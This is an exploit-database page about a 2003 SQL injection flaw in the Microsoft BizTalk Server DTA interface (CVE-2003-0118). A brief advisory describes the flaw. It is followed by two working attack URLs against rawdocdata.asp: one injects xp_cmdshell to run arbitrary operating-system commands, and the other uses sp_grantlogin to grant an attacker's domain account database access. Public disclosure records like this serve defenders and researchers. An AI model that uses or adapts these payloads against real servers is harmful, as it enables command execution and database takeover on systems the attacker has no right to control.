[] NeoSense
E X P L O I T S
title author type platform port cve id

Microsoft BizTalk Server 2000/2002 DTA - 'rawdocdata.asp' SQL Injection

Author: Cesar Cerrudo
type: webapps
platform: asp
port: 
date_added: 2003-04-30 
date_updated: 2012-11-08 
verified: 1 
codes: CVE-2003-0118;OSVDB-10103 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/7470/info

A vulnerability has been reported for BizTalk Server which may make it possible for remote users to modify database query logic. The vulnerability exists in some of the pages used by the DTA interface.

This vulnerability may be the result of inadequate sanitization of user-supplied values for some parameters. A remote attacker may exploit this vulnerability by creating a malicious URL that includes specially crafted SQL queries to execute commands or compromise the database.


http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'--

http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.sp_grantlogin 'domain\attacker'--
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.